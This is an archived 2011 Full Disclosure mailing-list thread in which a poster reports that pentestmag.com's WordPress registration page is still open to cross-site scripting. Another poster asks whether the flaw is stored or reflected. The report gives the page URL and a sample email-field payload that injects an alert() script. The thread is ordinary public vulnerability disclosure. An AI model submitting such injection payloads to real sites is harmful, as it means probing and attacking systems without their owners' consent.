Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: PenTest mag

From: Tomy <support () vs-db info>
Date: Thu, 8 Dec 2011 00:15:39 +0100

it does not matter, it's about the fact that  someone who publishes such a newspaper should know his stuff..

Tomy



Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04:


Nice, but is it stored? Or at least reflective?

On Dec 7, 2011 2:59 PM, "Tomy" <support () vs-db info> wrote:

still vulnerable:

sample:
http://pentestmag.com:80/wp-login.php?action=register (XSS)

e-mail:
John.Doe () somewhere com</sCrIpT><sCrIpT>alert(87118)</sCrIpT>


LOL



Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30:





Tomy
support () vs-db info




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Tomy
support () vs-db info




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: